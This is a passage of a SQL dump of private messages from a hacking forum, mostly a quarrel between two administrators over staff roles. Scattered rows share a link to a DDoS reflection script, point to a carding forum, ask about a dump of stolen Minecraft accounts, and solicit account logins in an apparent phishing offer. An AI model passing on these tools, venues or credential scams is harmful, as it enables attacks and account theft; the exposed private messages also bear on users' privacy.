is NOT a TEMPORARY ADMIN. Do you get that or not? [/quote] I see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'( [/quote] Speaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No. Why did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH. I sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat. I still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you. [/quote] If I advertise LH I will get banned... I would do not want to get banned that is hardly fair. The last few weeks I have been very active and I post at least 2+ posts a day. You actually have not sent me pms to discuss anything. I never jumped down your throat I just asked you about it big difference.I am no longer your friend? No I did not consider you a friend I CONSIDERED YOU A BEST FRIEND. I never did anything to betray your trust when you added me back? [/quote] I did send you PMs but had to delete them time by time to have more space on the server. You did ask me why Reborn is mod again etc. You could have advertised and offered them free elite like me. I never got banned for offering free elite through PMs, I only got banned for posting a thread. [/quote] You never told me about that. Also one bad person through pm reports me and I get fucked... The pm thing well I cannot read what is not there to read if you deleted them. And you never answered the last things I wrote... ', '1350875843', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3718', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: A', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] http://l33thacking.net/misc.php?action=help&hid=12 [/quote] Dude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth [/quote] You are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN. Do you get that or not? [/quote] I see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'( [/quote] Speaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No. Why did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH. I sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat. I still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you. [/quote] If I advertise LH I will get banned... I would do not want to get banned that is hardly fair. The last few weeks I have been very active and I post at least 2+ posts a day. You actually have not sent me pms to discuss anything. I never jumped down your throat I just asked you about it big difference.I am no longer your friend? No I did not consider you a friend I CONSIDERED YOU A BEST FRIEND. I never did anything to betray your trust when you added me back? [/quote] I did send you PMs but had to delete them time by time to have more space on the server. You did ask me why Reborn is mod again etc. You could have advertised and offered them free elite like me. I never got banned for offering free elite through PMs, I only got banned for posting a thread. [/quote] You never told me about that. Also one bad person through pm reports me and I get fucked... The pm thing well I cannot read what is not there to read if you deleted them. And you never answered the last things I wrote... [/quote] Whatever the case might be. I don\'t want you to abuse your privileges or call anyone temp. What are your questions? [/quote] That is the thing I never abused my privileges? When did I? I tool ipods GFX award off only because he is not a gfx pro. I deleted a spammers posts who was spamming CC shops and shit. I never abused it.... We are no longer friends?', '1350876415', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3721', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: A', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] http://l33thacking.net/misc.php?action=help&hid=12 [/quote] Dude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth [/quote] You are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN. Do you get that or not? [/quote] I see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'( [/quote] Speaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No. Why did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH. I sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat. I still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you. [/quote] If I advertise LH I will get banned... I would do not want to get banned that is hardly fair. The last few weeks I have been very active and I post at least 2+ posts a day. You actually have not sent me pms to discuss anything. I never jumped down your throat I just asked you about it big difference.I am no longer your friend? No I did not consider you a friend I CONSIDERED YOU A BEST FRIEND. I never did anything to betray your trust when you added me back? [/quote] I did send you PMs but had to delete them time by time to have more space on the server. You did ask me why Reborn is mod again etc. You could have advertised and offered them free elite like me. I never got banned for offering free elite through PMs, I only got banned for posting a thread. [/quote] You never told me about that. Also one bad person through pm reports me and I get fucked... The pm thing well I cannot read what is not there to read if you deleted them. And you never answered the last things I wrote... [/quote] Whatever the case might be. I don\'t want you to abuse your privileges or call anyone temp. What are your questions? [/quote] That is the thing I never abused my privileges? When did I? I tool ipods GFX award off only because he is not a gfx pro. I deleted a spammers posts who was spamming CC shops and shit. I never abused it.... We are no longer friends? [/quote] If you are my friend then yes I\'m your friend. Abuse of power: http://l33thacking.net/misc.php?action=help&hid=12 Read the first one. [/quote] I still consider you my best one. Just annoyed atm. And I had not read that now I know. And it would not have been a problem if I was admin again.:angel:', '1350876645', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3724', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: A', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] http://l33thacking.net/misc.php?action=help&hid=12 [/quote] Dude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth [/quote] You are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN. Do you get that or not? [/quote] I see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'( [/quote] Speaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No. Why did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH. I sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat. I still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you. [/quote] If I advertise LH I will get banned... I would do not want to get banned that is hardly fair. The last few weeks I have been very active and I post at least 2+ posts a day. You actually have not sent me pms to discuss anything. I never jumped down your throat I just asked you about it big difference.I am no longer your friend? No I did not consider you a friend I CONSIDERED YOU A BEST FRIEND. I never did anything to betray your trust when you added me back? [/quote] I did send you PMs but had to delete them time by time to have more space on the server. You did ask me why Reborn is mod again etc. You could have advertised and offered them free elite like me. I never got banned for offering free elite through PMs, I only got banned for posting a thread. [/quote] You never told me about that. Also one bad person through pm reports me and I get fucked... The pm thing well I cannot read what is not there to read if you deleted them. And you never answered the last things I wrote... [/quote] Whatever the case might be. I don\'t want you to abuse your privileges or call anyone temp. What are your questions? [/quote] That is the thing I never abused my privileges? When did I? I tool ipods GFX award off only because he is not a gfx pro. I deleted a spammers posts who was spamming CC shops and shit. I never abused it.... We are no longer friends? [/quote] If you are my friend then yes I\'m your friend. Abuse of power: http://l33thacking.net/misc.php?action=help&hid=12 Read the first one. [/quote] I still consider you my best one. Just annoyed atm. And I had not read that now I know. And it would not have been a problem if I was admin again.:angel: [/quote] As I said after your confirmation I need an active admin that can help me with the ACP related stuff. [/quote] Confirmation. Right now as I finished my big project. ', '1350876767', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3726', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', '.', '0', 'You are my friend or not? It is not a tit for tat it is yes or no. Ps. I fucked at least ten bitches today.', '1350877261', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3779', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hello', '0', 'I was wondering when my LH Group is officel, i changed the userbar already. i cant\'t wait cuz i have many good tutorials for my group :P ', '1351094401', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3781', '61', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Gamers Recruitment ', '0', 'You have been accepted, Please give me some time to gather more members.', '1351105179', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3783', '228', '2', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'Hello', '0', 'I don\'t know if you can but can you make my group marketers officel in LH?', '1351112733', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3785', '2', '228', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hello', '0', '[quote=\'VirtualLegend\'] I don\'t know if you can but can you make my group marketers officel in LH? [/quote] I am not sure. I would try but I am on prob atm so I do not want anything with joker even if we are good friends. ', '1351114981', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3760', '228', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Hello', '0', '[quote=\'NXK\'] [quote=\'VirtualLegend\'] When is my group Marketers officel on LH? [/quote] When you find a different userbar. Contact reloadzor he may be interested in making you one. [/quote] I have already updated my userbar Check it out', '1350940563', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3762', '61', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hello', '0', '[quote=\'VirtualLegend\'] [quote=\'NXK\'] [quote=\'VirtualLegend\'] When is my group Marketers officel on LH? [/quote] When you find a different userbar. Contact reloadzor he may be interested in making you one. [/quote] I have already updated my userbar Check it out [/quote] Ill Do it now.', '1350940619', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3752', '284', '100', '284', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'drdos script', '0', 'Hi, can you share your script with me? Thank You. ', '1350911437', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3754', '100', '284', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"284\";}}', '2', 'Re: drdos script', '0', '[quote=\'h3rcul3s\'] Hi, can you share your script with me? Thank You. [/quote] Enjoy- http://pastebin.com/EgnhCsGm', '1350921831', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3791', '255', '62', '255', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'hi', '0', 'hi frnd can u tell me some forums name where i post premium acount with adf.ly or adfoc.us link. please tell me if u know about such forum.', '1351152357', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3793', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'hey', '0', 'hey man could you please open a new thread on the unique recruitment, because i would love to join this group :P', '1351153094', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3795', '62', '255', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"255\";}}', '2', 'Re: hi', '0', '[quote=\'sbhshroy2\'] hi frnd can u tell me some forums name where i post premium acount with adf.ly or adfoc.us link. please tell me if u know about such forum. [/quote] ABH - http://alboraaq.com/ will get you alot of clicks, but it\'s kinda a blackhat/carding forum', '1351154688', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3797', '205', '1', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: treyz123456789 ', '0', 'Hey mate, treyz123456789 PM\'d me on UB, saying that his IP Is banned (just like what happened to me), and asked me to message you. He can\'t access LH I\'ll leave In your capable hands :)', '1351165518', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3799', '228', '205', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '2', 'Hello', '0', 'Do you want to join my group? Check it out ', '1351165591', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3801', '228', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Hello', '0', 'You want to join my group', '1351166274', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3803', '62', '228', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hello', '0', '[quote=\'VirtualLegend\'] You want to join my group [/quote] I\'d love to bro.', '1351166785', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3805', '228', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: Hello', '0', '[quote=\'R?????zo?\'] [quote=\'VirtualLegend\'] You want to join my group [/quote] I\'d love to bro. [/quote] http://l33thacking.net/thread-1094-post-6348.html#pid6348 To Apply, I will then accept you bro', '1351167273', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3807', '205', '228', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hello', '0', '[quote=\'VirtualLegend\'] Do you want to join my group? Check it out [/quote] Hey mate, I shall check It out In detail shortly :)', '1351168044', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3809', '62', '228', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hello', '0', '[quote=\'VirtualLegend\'] [quote=\'R?????zo?\'] [quote=\'VirtualLegend\'] You want to join my group [/quote] I\'d love to bro. [/quote] http://l33thacking.net/thread-1094-post-6348.html#pid6348 To Apply, I will then accept you bro [/quote] applied, hope its good enough :3', '1351169021', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3811', '228', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: Hello', '0', '[quote=\'R?????zo?\'] [quote=\'VirtualLegend\'] [quote=\'R?????zo?\'] [quote=\'VirtualLegend\'] You want to join my group [/quote] I\'d love to bro. [/quote] http://l33thacking.net/thread-1094-post-6348.html#pid6348 To Apply, I will then accept you bro [/quote] applied, hope its good enough :3 [/quote] Welcome to the group buddy', '1351169297', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3813', '255', '62', '255', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: hi', '0', '[quote=\'R?????zo?\'] [quote=\'sbhshroy2\'] hi frnd can u tell me some forums name where i post premium acount with adf.ly or adfoc.us link. please tell me if u know about such forum. [/quote] ABH - http://alboraaq.com/ will get you alot of clicks, but it\'s kinda a blackhat/carding forum [/quote] thanks', '1351170636', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3815', '100', '160', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"160\";}}', '2', 'Minecraft Accounts', '0', 'Heyo, I was wondering where you got those 20,000 minecraft accounts. I know it was from a forum but could you link me?', '1351189989', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3817', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'rewards', '0', 'hi. All awards reset? even donated to a mod for one D:', '1351202017', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3819', '160', '100', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Re: Minecraft Accounts', '0', '[quote=\'??zg???g????61\'] Heyo, I was wondering where you got those 20,000 minecraft accounts. I know it was from a forum but could you link me? [/quote] NodusGriefing.com', '1351209043', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3822', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: rewards', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] hi. All awards reset? even donated to a mod for one D: [/quote] Yes all have been reset. I remember your donation award, I will think of something. Also, I\'m sure you had more awards do you remember what they were? [/quote] ah okay. I remember i had: Swag Dangerous Programmar Diamond Genius (Java) I remember i had all of these, and some more, but i dont remember what more.', '1351253718', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3824', '257', '2', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'hey ', '0', 'hey man whats happening me and you havent talked much so yeah whats happening', '1351306183', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3826', '2', '257', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey ', '0', '[quote=\'XxTREYZxX\'] hey man whats happening me and you havent talked much so yeah whats happening [/quote] Nm exhausted from life. Going to bed soon you?', '1351306887', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3828', '257', '2', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'Re: hey ', '0', '[quote=\'Apathy\'] [quote=\'XxTREYZxX\'] hey man whats happening me and you havent talked much so yeah whats happening [/quote] Nm exhausted from life. Going to bed soon you? [/quote] Home alone. and eating food aahha ', '1351307219', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3830', '2', '257', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey ', '0', '[quote=\'XxTREYZxX\'] [quote=\'Apathy\'] [quote=\'XxTREYZxX\'] hey man whats happening me and you havent talked much so yeah whats happening [/quote] Nm exhausted from life. Going to bed soon you? [/quote] Home alone. and eating food aahha [/quote] Nice :P What type?', '1351308545', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3832', '257', '2', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'Re: hey ', '0', '[quote=\'Apathy\'] [quote=\'XxTREYZxX\'] [quote=\'Apathy\'] [quote=\'XxTREYZxX\'] hey man whats happening me and you havent talked much so yeah whats happening [/quote] Nm exhausted from life. Going to bed soon you? [/quote] Home alone. and eating food aahha [/quote] Nice :P What type? [/quote] Those Sakata things :P', '1351308933', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3835', '257', '294', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"294\";}}', '2', 'hey ', '0', 'hey mate where are you from and who referred you :P', '1351309307', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3838', '53', '100', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Ddosers', '0', 'Hello Can I join your group? I think I will be able to answer the questions. Thanks ', '1351329608', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3842', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Adfocus', '0', 'Hi sirchamp, It looks like a good bussines for you, but the layout isn\'t that great if you want i could make a HQ thread for you with photoshop, but it will take some time cuz I\'m busy atm.', '1351367310', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3844', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Adfoc.us views', '0', 'Hello I can boost your adfoc.us. For free! But you have to leave a vouch in the thread. Thanks. Send me your adfoc.us account details. I need the account details to see how much views you have and how much there are to go. I wont change any details. The only thing I will do is perhaps shrink a few more links so I can do the method faster. Send me the details over skype. thanks', '1351369919', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3846', '53', '228', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Adfocus', '0', '[quote=\'VirtualLegend\'] Hi sirchamp, It looks like a good bussines for you, but the layout isn\'t that great if you want i could make a HQ thread for you with photoshop, but it will take some time cuz I\'m busy atm. [/quote] If you would that Id be very thankful. I can even give you 5k views for free if you want. thats like 15 dollars^^ Thanks', '1351370044', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, 